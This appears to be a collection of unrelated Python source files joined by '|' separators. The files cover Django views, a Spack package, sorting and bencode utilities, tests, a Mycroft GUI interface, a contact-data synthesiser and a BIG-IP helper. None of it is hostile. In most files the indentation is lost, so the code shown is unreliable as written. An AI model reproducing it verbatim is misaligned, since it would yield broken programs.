from django.shortcuts import render
from django.http import HttpResponse
from .ques_retrieve import *
import json
import numpy as np
# Create your views here.
retrieve_model = Predict()
# with open('../ans-score.json','r') as f:
# ans_so = json.load(f)
def home(request):
global retrieve_model
global ans_so
if request.method == "POST":
req_dict = request.POST
sentence = req_dict['search']
ans_so, output = retrieve_model.predict(sentence.strip())
print(ans_so)
print(output)
titles = []
all_questions = []
for item in retrieve_model.top_ques.ques:
all_questions.append( {'qtitle':item[0], 'qurl':item[2]} )
for item in output:
ans = []
qid = str(item['qid'])
try:
for ans_score in ans_so[qid]:
if ans_score['sentimental_score'] > 0.0:
sentiment = 'positive'
elif ans_score['sentimental_score'] == 0.0:
sentiment = 'neutral'
else:
sentiment = 'negative'
sentimental_sc = ans_score['sentimental_score']
sc = ans_score['score']
if np.isnan(sentimental_sc):
sentimental_sc = 0.0
sentimental_sc = "{:.5f}".format(sentimental_sc)
sc = "{:.5f}".format(sc)
ans.append({
'aid':str(ans_score['aid']),
'senti_score':str(sentimental_sc),
'upvote':str(ans_score['upvotes']),
'sentiment':sentiment,
'score':str(sc)
})
except:
pass
titles.append( {'qtitle' : item['qtitle'], 'qurl' : item['qurl'], 'aid': ans} )
temp = {
'all_questions': all_questions[:50],
'output': titles,
'show' : True,
'sentence' : sentence
}
print("="*25,"Done Fetching","="*25)
return render(request, 'main.html', temp)
else:
return render(request, 'main.html')
def profile(request):
return render(request, 'userprofile.html')
def signin(request):
return render(request, 'signin.html')
def signup(request):
return render(request, 'signup.html')
def post(request):
return render(request, 'post_question.html')
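# A possible URL wiring for the views above (a sketch only; the route paths and
# names are assumptions, not taken from the project):
#
#     from django.urls import path
#     from . import views
#
#     urlpatterns = [
#         path('', views.home, name='home'),
#         path('profile/', views.profile, name='profile'),
#         path('signin/', views.signin, name='signin'),
#         path('signup/', views.signup, name='signup'),
#         path('post/', views.post, name='post'),
#     ]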
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RLpsolve(RPackage):
"""Lp_solve is freely available (under LGPL 2) software for solving
linear, integer and mixed integer programs. In this
implementation we supply a "wrapper" function in C and some R
functions that solve general linear/integer problems, assignment
problems, and transportation problems. This version calls
lp_solve."""
homepage = "https://cloud.r-project.org/package=lpSolve"
url = "https://cloud.r-project.org/src/contrib/lpSolve_5.6.13.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/lpSolve"
version('5.6.13.2', sha256='75f0c0af5cbdc219ac29c792342ecd625903632ad86e581c408879958aa88539')
version('5.6.13.1', sha256='6ad8dc430f72a4698fc4a615bb5ecb73690b3c4520e84d9094af51a528f720b8')
version('5.6.13', sha256='d5d41c53212dead4fd8e6425a9d3c5767cdc5feb19d768a4704116d791cf498d')
|
from heapq import heappush, heappop
def heap_sort(heap_iterable):
'''
Heap sort implementation
'''
heap = []
for val in heap_iterable:
heappush(heap, val)
return [heappop(heap) for _ in range(len(heap))]
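# An equivalent variant (a sketch, not part of the original module) that builds the
# heap in O(n) with heapq.heapify instead of n pushes costing O(log n) each; the
# overall sort is still O(n log n) because of the pops.
def heap_sort_via_heapify(iterable):
    from heapq import heapify
    heap = list(iterable)
    heapify(heap)  # O(n) in-place heap construction
    return [heappop(heap) for _ in range(len(heap))]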
# Test
if __name__ == '__main__':
test_cases = (
[1, 3, 5, 7, 9, 2, 4, 6, 8, 0],
[3, 15, 68, 34, 39, 85, 85, 71, 47, 84],
[3, 10, 68, 34, 15, 85, 85, 71, 47, 84, 39],
[2, 10, 3, 34, 15, 68, 85, 71, 47, 84, 39, 85],
[1, 10, 2, 34, 15, 3, 85, 71, 47, 84, 39, 85, 68],
range(50)
)
for iterable in test_cases:
assert heap_sort(iterable) == sorted(iterable)
|
# Written by Petru Paler
# Some bits removed by uriel, all bugs are his fault.
def decode_int(x, f):
f += 1
newf = x.index('e', f)
try:
n = int(x[f:newf])
except (OverflowError, ValueError):
n = long(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(':', f)
try:
n = int(x[f:colon])
except (OverflowError, ValueError):
n = long(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
lastkey = None
while x[f] != 'e':
k, f = decode_string(x, f)
if lastkey >= k:
raise ValueError
lastkey = k
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError):
raise ValueError
if l != len(x):
raise ValueError
return r
from types import StringType, IntType, LongType, DictType, ListType, TupleType, BooleanType
class Bencached(object):
__slots__ = ['bencoded']
def __init__(self, s):
self.bencoded = s
def encode_bencached(x,r):
r.append(x.bencoded)
def encode_int(x, r):
r.extend(('i', str(x), 'e'))
def encode_string(x, r):
r.extend((str(len(x)), ':', x))
def encode_list(x, r):
r.append('l')
for i in x:
encode_func[type(i)](i, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k, v in ilist:
r.extend((str(len(k)), ':', k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[type(Bencached(0))] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
encode_func[BooleanType] = encode_int
def bencode(x):
r = []
encode_func[type(x)](x, r)
return ''.join(r)
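# A minimal round-trip sketch (assumes Python 2, matching the long/StringType usage
# above; the sample dictionary is illustrative only):
#
#     data = {'announce': 'http://tracker.example/announce',
#             'info': {'length': 42, 'name': 'file.bin'}}
#     encoded = bencode(data)
#     assert bdecode(encoded) == data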
|
from .parts.environment import *
from .parts.agents import *
partial_state_update_block = [
{
# environment.py
'policies': {
'grow_food': grow_food
},
'variables': {
'sites': update_food
}
},
{
# agents.py
'policies': {
'increase_agent_age': digest_and_olden
},
'variables': {
'agents': agent_food_age
}
},
{
# agents.py
'policies': {
'move_agent': move_agents
},
'variables': {
'agents': agent_location
}
},
{
# agents.py
'policies': {
'reproduce_agents': reproduce_agents
},
'variables': {
'agents': agent_create
}
},
{
# agents.py
'policies': {
'feed_prey': feed_prey
},
'variables': {
'agents': agent_food,
'sites': site_food
}
},
{
# agents.py
'policies': {
'hunt_prey': hunt_prey
},
'variables': {
'agents': agent_food
}
},
{
# agents.py
'policies': {
'hunt_prey': hunt_everybody
},
'variables': {
'agents': agent_food
}
},
{
# agents.py
'policies': {
'natural_death': natural_death
},
'variables': {
'agents': agent_remove
}
}
]
|
import unittest
class PickleableSession(unittest.TestCase):
def test_constructor_and_properties(self):
from vishnu.backend.client import PickleableSession
from datetime import datetime
expires = datetime(2018, 1, 1, 0, 0, 0)
last_accessed = datetime(2017, 12, 30, 10, 0, 0)
data = "data"
ps = PickleableSession(
expires=expires,
last_accessed=last_accessed,
data=data
)
self.assertEqual(ps.expires, expires)
self.assertEqual(ps.last_accessed, last_accessed)
self.assertEqual(ps.data, data)
def test_can_pickle(self):
pass
|
#! python
# -*- coding: utf-8 -*-
from itertools import chain
import plugins.ld_ring as base
## reload(base)
class Model(base.Model):
def residual(self, fitting_params, x, y):
"""最小自乗法の剰余函数"""
xc, yc = 0, 0
cam, ratio, phi = fitting_params
z = base.calc_aspect(x + 1j*y, 1/ratio, phi) # z = x+iy --> inverse transform 1/r
## correction when phi exceeds the +/-90 deg range
if not -90 < phi < 90:
## print(" warning! phi is over limit ({:g})".format(phi))
if phi < -90: phi += 180
elif phi > 90: phi -= 180
fitting_params[2] = phi
if not self.owner.thread.is_active:
print("... Iteration stopped")
raise StopIteration
## evaluate the deviation from a perfect circle
x, y = z.real, z.imag
rc = cam * self.Angles[self.Index]
res = abs((x-xc)**2 + (y-yc)**2 - rc**2)
print("\b"*72 + "point({}): residual {:g}".format(len(res), sum(res)), end='')
return res
class Plugin(base.Plugin):
"""Distortion fitting of ring (override) with fixed origin center
"""
menu = "Plugins/Measure &Cetntral-dist"
Fitting_model = Model
fitting_params = property(
lambda self: self.grid_params[:1] + self.ratio_params)
def Init(self):
base.Plugin.Init(self)
for lp in chain(self.dist_params, self.grid_params[1:]):
for k in lp.knobs:
k.Enable(0)
self.show(0, False)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organization', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='section',
name='default_card',
field=models.ImageField(help_text=b"Default card for stories in this section that don't specify their own card.", upload_to=b'organization/section/default_card'),
),
migrations.AlterField(
model_name='section',
name='default_card_focus',
field=models.CharField(default=b'cc', help_text=b"Location of the focal point for this section's card image.", max_length=2, choices=[(b'cc', b'center center'), (b'cl', b'center left'), (b'cr', b'center right'), (b'tl', b'top left'), (b'tc', b'top center'), (b'tr', b'top right'), (b'bl', b'bottom left'), (b'bc', b'bottom center'), (b'br', b'bottom right')]),
),
migrations.AlterField(
model_name='section',
name='description',
field=models.TextField(help_text=b'Short description of what this section covers/is about.', blank=True),
),
migrations.AlterField(
model_name='section',
name='facebook',
field=models.CharField(help_text=b'Facebook username for this section. Can be found in the URL.', max_length=32, blank=True),
),
migrations.AlterField(
model_name='section',
name='position',
field=models.PositiveIntegerField(help_text=b'Ordering of this section relative to other sections.'),
),
migrations.AlterField(
model_name='section',
name='profile_image',
field=models.ImageField(help_text=b'Social media profile image for this section.', upload_to=b'organization/section/profile_image', blank=True),
),
migrations.AlterField(
model_name='section',
name='slug',
field=models.SlugField(help_text=b'Used as part of the URL for this section.', unique=True, max_length=32),
),
migrations.AlterField(
model_name='section',
name='twitter',
field=models.CharField(help_text=b'Twitter handle for this section, without an "@" symbol.', max_length=15, blank=True),
),
migrations.AlterField(
model_name='tag',
name='description',
field=models.TextField(help_text=b'Short description of what this tag is about.', blank=True),
),
migrations.AlterField(
model_name='tag',
name='series',
field=models.BooleanField(default=False, help_text=b'Whether or not this tag forms a series.'),
),
migrations.AlterField(
model_name='tag',
name='slug',
field=models.SlugField(help_text=b'Used as part of the URL for this tag.', unique=True, max_length=32),
),
]
|
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Interface for interacting with the Mycroft gui qml viewer. """
from os.path import join
from mycroft.configuration import Configuration
from mycroft.messagebus.message import Message
from mycroft.util import resolve_resource_file
class SkillGUI:
"""SkillGUI - Interface to the Graphical User Interface
Values set in this class are synced to the GUI, accessible within QML
via the built-in sessionData mechanism. For example, in Python you can
write in a skill:
self.gui['temp'] = 33
self.gui.show_page('Weather.qml')
Then in the Weather.qml you'd access the temp via code such as:
text: sessionData.temp
"""
def __init__(self, skill):
self.__session_data = {} # synced to GUI for use by this skill's pages
self.page = None # the active GUI page (e.g. QML template) to show
self.skill = skill
self.on_gui_changed_callback = None
self.config = Configuration.get()
@property
def remote_url(self):
"""Returns configuration value for url of remote-server."""
return self.config.get('remote-server')
def build_message_type(self, event):
"""Builds a message matching the output from the enclosure."""
return '{}.{}'.format(self.skill.skill_id, event)
def setup_default_handlers(self):
"""Sets the handlers for the default messages."""
msg_type = self.build_message_type('set')
self.skill.add_event(msg_type, self.gui_set)
def register_handler(self, event, handler):
"""Register a handler for GUI events.
When using the triggerEvent method from Qt
triggerEvent("event", {"data": "cool"})
Arguments:
event (str): event to catch
handler: function to handle the event
"""
msg_type = self.build_message_type(event)
self.skill.add_event(msg_type, handler)
def set_on_gui_changed(self, callback):
"""Registers a callback function to run when a value is
changed from the GUI.
Arguments:
callback: Function to call when a value is changed
"""
self.on_gui_changed_callback = callback
def gui_set(self, message):
"""Handler catching variable changes from the GUI.
Arguments:
message: Messagebus message
"""
for key in message.data:
self[key] = message.data[key]
if self.on_gui_changed_callback:
self.on_gui_changed_callback()
def __setitem__(self, key, value):
"""Implements set part of dict-like behaviour with named keys."""
self.__session_data[key] = value
if self.page:
# emit notification (but not needed if page has not been shown yet)
data = self.__session_data.copy()
data.update({'__from': self.skill.skill_id})
self.skill.bus.emit(Message("gui.value.set", data))
def __getitem__(self, key):
"""Implements get part of dict-like behaviour with named keys."""
return self.__session_data[key]
def __contains__(self, key):
"""Implements the "in" operation."""
return self.__session_data.__contains__(key)
def clear(self):
"""Reset the value dictionary, and remove namespace from GUI."""
self.__session_data = {}
self.page = None
self.skill.bus.emit(Message("gui.clear.namespace",
{"__from": self.skill.skill_id}))
def send_event(self, event_name, params=None):
"""Trigger a gui event.
Arguments:
event_name (str): name of event to be triggered
params: json serializable object containing any parameters that
should be sent along with the request.
"""
params = params or {}
self.skill.bus.emit(Message("gui.event.send",
{"__from": self.skill.skill_id,
"event_name": event_name,
"params": params}))
def show_page(self, name, override_idle=None,
override_animations=False):
"""Begin showing the page in the GUI
Arguments:
name (str): Name of page (e.g "mypage.qml") to display
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.show_pages([name], 0, override_idle, override_animations)
def show_pages(self, page_names, index=0, override_idle=None,
override_animations=False):
"""Begin showing the list of pages in the GUI.
Arguments:
page_names (list): List of page names (str) to display, such as
["Weather.qml", "Forecast.qml", "Details.qml"]
index (int): Page number (0-based) to show initially. For the
above list a value of 1 would start on "Forecast.qml"
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
if not isinstance(page_names, list):
raise ValueError('page_names must be a list')
if index >= len(page_names):
raise ValueError('Default index is larger than page list length')
self.page = page_names[index]
# First sync any data...
data = self.__session_data.copy()
data.update({'__from': self.skill.skill_id})
self.skill.bus.emit(Message("gui.value.set", data))
# Convert pages to full reference
page_urls = []
for name in page_names:
if name.startswith("SYSTEM"):
page = resolve_resource_file(join('ui', name))
else:
page = self.skill.find_resource(name, 'ui')
if page:
if self.config.get('remote'):
page_urls.append(self.remote_url + "/" + page)
else:
page_urls.append("file://" + page)
else:
raise FileNotFoundError("Unable to find page: {}".format(name))
self.skill.bus.emit(Message("gui.page.show",
{"page": page_urls,
"index": index,
"__from": self.skill.skill_id,
"__idle": override_idle,
"__animations": override_animations}))
def remove_page(self, page):
"""Remove a single page from the GUI.
Arguments:
page (str): Page to remove from the GUI
"""
return self.remove_pages([page])
def remove_pages(self, page_names):
"""Remove a list of pages in the GUI.
Arguments:
page_names (list): List of page names (str) to display, such as
["Weather.qml", "Forecast.qml", "Other.qml"]
"""
if not isinstance(page_names, list):
raise ValueError('page_names must be a list')
# Convert pages to full reference
page_urls = []
for name in page_names:
page = self.skill.find_resource(name, 'ui')
if page:
page_urls.append("file://" + page)
else:
raise FileNotFoundError("Unable to find page: {}".format(name))
self.skill.bus.emit(Message("gui.page.delete",
{"page": page_urls,
"__from": self.skill.skill_id}))
def show_text(self, text, title=None, override_idle=None,
override_animations=False):
"""Display a GUI page for viewing simple text.
Arguments:
text (str): Main text content. It will auto-paginate
title (str): A title to display above the text content.
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["text"] = text
self["title"] = title
self.show_page("SYSTEM_TextFrame.qml", override_idle,
override_animations)
def show_image(self, url, caption=None,
title=None, fill=None,
override_idle=None, override_animations=False):
"""Display a GUI page for viewing an image.
Arguments:
url (str): Pointer to the image
caption (str): A caption to show under the image
title (str): A title to display above the image content
fill (str): Fill type supports 'PreserveAspectFit',
'PreserveAspectCrop', 'Stretch'
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["image"] = url
self["title"] = title
self["caption"] = caption
self["fill"] = fill
self.show_page("SYSTEM_ImageFrame.qml", override_idle,
override_animations)
def show_animated_image(self, url, caption=None,
title=None, fill=None,
override_idle=None, override_animations=False):
"""Display a GUI page for viewing an image.
Arguments:
url (str): Pointer to the .gif image
caption (str): A caption to show under the image
title (str): A title to display above the image content
fill (str): Fill type supports 'PreserveAspectFit',
'PreserveAspectCrop', 'Stretch'
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["image"] = url
self["title"] = title
self["caption"] = caption
self["fill"] = fill
self.show_page("SYSTEM_AnimatedImageFrame.qml", override_idle,
override_animations)
def show_html(self, html, resource_url=None, override_idle=None,
override_animations=False):
"""Display an HTML page in the GUI.
Arguments:
html (str): HTML text to display
resource_url (str): Pointer to HTML resources
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["html"] = html
self["resourceLocation"] = resource_url
self.show_page("SYSTEM_HtmlFrame.qml", override_idle,
override_animations)
def show_url(self, url, override_idle=None,
override_animations=False):
"""Display an HTML page in the GUI.
Arguments:
url (str): URL to render
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["url"] = url
self.show_page("SYSTEM_UrlFrame.qml", override_idle,
override_animations)
def shutdown(self):
"""Shutdown gui interface.
Clear pages loaded through this interface and remove the skill
reference to make reference-counting warnings more precise.
"""
self.clear()
self.skill = None
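# A minimal usage sketch from inside a skill (assumes `self` is a MycroftSkill whose
# `gui` attribute is an instance of this SkillGUI; handler and page names are
# illustrative only):
#
#     self.gui['temp'] = 33
#     self.gui.register_handler('refresh', self.handle_refresh)  # QML side: triggerEvent("refresh", {...})
#     self.gui.show_page('Weather.qml')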
|
"""Search Using a Boolean Variable"""
found = False
print('Before', found)
for value in [9, 41, 12, 3, 74, 15]:
if value == 3:
found = True
break
print(found, value)
print('After: ', found)
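# An equivalent one-liner (a sketch) using the built-in any(), which also stops
# scanning as soon as a match is found:
found_any = any(value == 3 for value in [9, 41, 12, 3, 74, 15])
print('After (any):', found_any)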
|
def test_abinit_parser():
"""
Test (pychemia.code.abinit) [parser] :
"""
from pychemia.code.abinit import parser
from numpy import array, all, ones
from math import sqrt
import tempfile
wf = tempfile.NamedTemporaryFile(mode='w')
wf.write(' # Comentario\n')
wf.write(' ! Comentario\n')
wf.write('\n')
wf.write('inputvar1 1 # integer\n')
wf.write('inputvar2 1.2 # float\n')
wf.write('inputvar3 3*4 # list of integer\n')
wf.write('inputvar4 3*4.5 # list of float\n')
wf.write('inputvar5 3*4.5e6 # list of float\n')
wf.write('inputvar6 3*4.5d7 # list of float\n')
wf.write('inputvar7 3*4.5E6 # list of float\n')
wf.write('inputvar8 3*4.5D7 # list of float\n')
wf.write('inputvar9 *1\n')
wf.write('inputvar10 sqrt(2)\n')
wf.write('inputvar11 6*sqrt(3)\n')
wf.flush()
inp = parser(wf.name)
wf.close()
assert len(inp.keys()) == 11
assert inp['inputvar1'] == array([1])
assert inp['inputvar2'] == array([1.2])
assert all(inp['inputvar3'] == 4 * ones(3))
assert all(inp['inputvar4'] == 4.5 * ones(3))
assert all(inp['inputvar5'] == 4.5e6 * ones(3))
assert all(inp['inputvar6'] == 4.5e7 * ones(3))
assert all(inp['inputvar7'] == 4.5e6 * ones(3))
assert all(inp['inputvar8'] == 4.5e7 * ones(3))
assert inp['inputvar9'] == '*1'
assert inp['inputvar10'] == sqrt(2)
assert all(inp['inputvar11'] == sqrt(3) * ones(6))
def test_abinit_utils():
"""
Test (pychemia.code.abinit) [utils] :
"""
from pychemia.utils.netcdf import netcdf2dict
from pychemia.code.abinit import xyz2input, psp_name
filename = "tests/data/abinit_05/abinit-o_OUT.nc"
print(len(netcdf2dict(filename)))
assert len(netcdf2dict(filename)) == 45
assert psp_name(1, 'LDA', 'FHI') == '01-H.LDA.fhi'
filename = "tests/data/abinit_01/abinit_DS11.xyz"
assert xyz2input(filename).variables['natom'] == 2
def test_abinit_abifiles():
"""
Test (pychemia.code.abinit) [abifiles] :
"""
from pychemia.code.abinit import AbiFiles
filename = "tests/data/abinit_01/abinit.files"
abf = AbiFiles(filename)
assert abf.filename == "abinit.files"
assert abf.get_input_filename() == 'tests/data/abinit_01/abinit.in'
def test_abinit_input():
"""
Test (pychemia.code.abinit) [input] :
"""
from pychemia.code.abinit import AbiFiles, AbinitInput
filename = "tests/data/abinit_01/abinit.files"
abf = AbiFiles(filename)
inp = AbinitInput(abf.get_input_filename())
print(inp)
print(len(inp))
assert len(inp) == 31
assert inp.get_value('ecut') == 10
assert len(inp.get_dtsets_keys()) == 12
assert inp.get_value('ntime', 41) == 10
assert inp.get_value('acell', 41)[0] == 14
def test_abinit():
"""
Test (pychemia.code.abinit) [general] :
"""
import os
import pychemia.code.abinit
af = pychemia.code.abinit.AbiFiles(basedir='tests/data/abinit_03')
iv = pychemia.code.abinit.AbinitInput('tests/data/abinit_03/rnpg.in')
af.set_input(iv)
af.set_psps('LDA', 'FHI')
af.create()
iv.write(af.get_input_filename())
assert len(open(af.get_input_filename()).readlines()) == 71
rf = open('tests/data/abinit_03/abinit.files')
data = rf.readlines()
print(data)
for i in [ -4, -3, -2, -1]:
assert(data[i].strip()[-4:] == '.fhi')
rf.close()
os.remove('tests/data/abinit_03/abinit.files')
|
<m>C:\Temp\EL> C:\Python23\python</m>
## (snipped: various greeting messages from Python)
>>> from elemlist import cons, car, cdr
>>> a = cons(1, cons(2, cons(3, ())))
>>> car(cdr(a))
2
>>>
|
import builtins
import csv
import random
import string
import re
import itertools
from security import *
################################################################################
with open('PCC Sales Contacts Master List S13.csv', newline='') as file:
file.readline()
file.readline()
reader = csv.DictReader(file)
table = tuple(reader)
def strip_columns(row):
for key, value in row.items():
row[key] = '' if value is None else value.strip()
def extract_contact_parts(row):
contact = row['Contact']
row['contact_fname'] = row['contact_lname'] = row['contact_title'] = ''
if contact:
parts = contact.split()
if parts[0] in {'Mr.', 'Mrs.', 'Dr.', 'Miss'}:
row['contact_title'] = parts.pop(0)
assert parts, 'Parts should not be empty!'
if len(parts) == 1:
row['contact_fname'] = parts[0]
else:
*first_name, last_name = parts
row['contact_fname'] = ' '.join(first_name)
row['contact_lname'] = last_name
TELEPHONE_REGEX = r'\A(17\s*-\s*\d{4}\s*-\s*[1-4]|((\d{3}\s*-\s*){1,2}\d{4})?(\s*[Ee][Xx][Tt]\.?\s*\d{1,7})?)\Z'
PHONE_TRANS = str.maketrans('ABCDEFGHIJKLMNOPQRSTUVWXYZ',
'22233344455566677778889999')
def phone_letter_to_number(text):
return text.upper().replace('EXT.', '\0') \
.translate(PHONE_TRANS).replace('\0', 'Ext.')
def scrub_telephone(row):
number = row['Telephone'].replace('?', '').replace(',', '')
if re.search(TELEPHONE_REGEX, number) is None:
match = re.search(r'^x(?P<ext>\d{4})$', number)
if match is not None:
number = '850-478-8496 Ext. ' + match.groupdict()['ext']
match = re.search(r'^(?P<num>(\d{3}\s*-\s*){1,2}\d{4})\s*x(?P<ext>\d{1,7})$', number)
if match is not None:
number = '{num} Ext. {ext}'.format(**match.groupdict())
match = re.search(r'^\((?P<area>\d{3})\)\s*(?P<tri>\d{3})\s*-\s*(?P<quad>\d{4})$', number)
if match is not None:
number = '{area}-{tri}-{quad}'.format(**match.groupdict())
number = phone_letter_to_number(number)
if re.search(TELEPHONE_REGEX, number) is None:
print('Warning:', repr(row['Telephone']), 'cannot be scrubbed!')
number = ''
row['Telephone'] = number
for row in table:
strip_columns(row)
extract_contact_parts(row)
scrub_telephone(row)
pivot = {column: [] for column in table[0]}
for row in table:
for column, value in row.items():
pivot[column].append(value)
################################################################################
company_name = set()
for value in pivot['Company Name (print your name)']:
company_name.update(value.split())
COMPANY_NAME_POOL = set(filter(None, (''.join(filter(
string.ascii_letters.__contains__, name)) for name in company_name)))
def generate_company_name():
used = set()
while True:
name = ' '.join(random.sample(COMPANY_NAME_POOL, random.randint(2, 5)))
if name not in used:
used.add(name)
yield name
################################################################################
address_number = set()
address_name = set()
for name in pivot['Address']:
for part in name.split():
if part.isdigit():
address_number.add(part)
elif part.isalpha():
address_name.add(part)
address_number = tuple(address_number)
def generate_address():
used = set()
while True:
name = '{} {} {}'.format(random.choice(address_number),
*random.sample(address_name, 2))
if name not in used:
used.add(name)
yield name
################################################################################
cities = set()
states = set()
for city_state in pivot['City, State']:
if ', ' in city_state:
c, s = city_state.split(', ')
cities.add(c.strip())
states.add(s.strip())
CITIES, STATES = tuple(cities), tuple(states)
def generate_city_state():
while True:
yield '{}, {}'.format(random.choice(CITIES), random.choice(STATES))
################################################################################
ZIP = tuple(set(filter(None, pivot['Zip'])))
def generate_zip():
while True:
yield random.choice(ZIP)
################################################################################
TITLE = tuple({n for n in pivot['contact_title'] if n})
FNAME = tuple({n for n in pivot['contact_fname'] if n.isalpha()})
LNAME = tuple({n for n in pivot['contact_lname'] if n.isalpha()})
def generate_contact():
used = set()
while True:
name = '{} {} {}'.format(random.choice(TITLE),
random.choice(FNAME),
random.choice(LNAME))
if name not in used:
used.add(name)
yield name
################################################################################
NUMBER_PARTS = {name: set() for name in ('area', 'tri', 'quad', 'ext')}
for number in filter(None, pivot['Telephone']):
group = re.search(r'\A((?P<area>\d{3})\s*-\s*)?(?P<tri>\d{3})\s*-\s*(?P<quad>\d{4})(\s*[Ee][Xx][Tt]\.?\s*(?P<ext>\d{1,7}))?\Z', number).groupdict()
for key, value in group.items():
NUMBER_PARTS[key].add(value)
for name, parts in NUMBER_PARTS.items():
parts.discard(None)
NUMBER_PARTS[name] = tuple(parts)
def generate_telephone():
used = set()
while True:
area = ext = ''
if random.randrange(2):
area = random.choice(NUMBER_PARTS['area']) + '-'
tri = random.choice(NUMBER_PARTS['tri']) + '-'
quad = random.choice(NUMBER_PARTS['quad'])
if random.randrange(2):
ext = ' Ext. ' + random.choice(NUMBER_PARTS['ext'])
number = area + tri + quad + ext
if number not in used:
used.add(number)
yield number
################################################################################
YEARS = set()
for cell in filter(None, itertools.chain(pivot['Arrow'], pivot['Calendar'])):
YEARS.update(''.join(c for c in cell if c in '1234567890,').split(','))
def generate_years():
while True:
if random.randrange(2):
yield ''
else:
yield ','.join(sorted(random.sample(YEARS, random.randint(
1, len(YEARS))), key=int))
################################################################################
COMMENTS = tuple(set(filter(None, pivot['Comments (Done?)'])))
def generate_comments():
while True:
if random.randrange(2):
yield ''
else:
yield random.choice(COMMENTS)
################################################################################
def main():
row_gen = generate_rows()
with builtins.open('expo_data.csv', 'w', newline='') as file:
writer = csv.DictWriter(file, reader.fieldnames)
writer.writeheader()
for _ in range(1000):
writer.writerow(next(row_gen))
def generate_rows():
name_gen = generate_company_name()
addr_gen = generate_address()
city_gen = generate_city_state()
code_gen = generate_zip()
repr_gen = generate_contact()
tele_gen = generate_telephone()
year_gen = generate_years()
note_gen = generate_comments()
while True:
yield dict(zip(reader.fieldnames, (next(name_gen),
next(addr_gen),
next(city_gen),
next(code_gen),
next(repr_gen),
next(tele_gen),
next(year_gen),
next(year_gen),
next(note_gen))))
################################################################################
if __name__ == '__main__':
main()
|
# Copyright 2014-2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from oslo_log import log as logging
from f5_openstack_agent.lbaasv2.drivers.bigip.network_helper import \
NetworkHelper
from f5_openstack_agent.lbaasv2.drivers.bigip.resource_helper \
import BigIPResourceHelper
from f5_openstack_agent.lbaasv2.drivers.bigip.resource_helper \
import ResourceType
LOG = logging.getLogger(__name__)
class SystemHelper(object):
def __init__(self):
self.exempt_folders = ['/', 'Common']
def create_folder(self, bigip, folder):
f = bigip.tm.sys.folders.folder
f.create(**folder)
def delete_folder(self, bigip, folder_name):
f = bigip.tm.sys.folders.folder
if f.exists(name=folder_name):
obj = f.load(name=folder_name)
obj.delete()
def folder_exists(self, bigip, folder):
if folder == 'Common':
return True
return bigip.tm.sys.folders.folder.exists(name=folder)
def get_folders(self, bigip):
f_collection = []
folders = bigip.tm.sys.folders.get_collection()
for folder in folders:
f_collection.append(folder.name)
return f_collection
def get_major_version(self, bigip):
version = self.get_version(bigip)
if version:
return version.split('.')[0]
return version
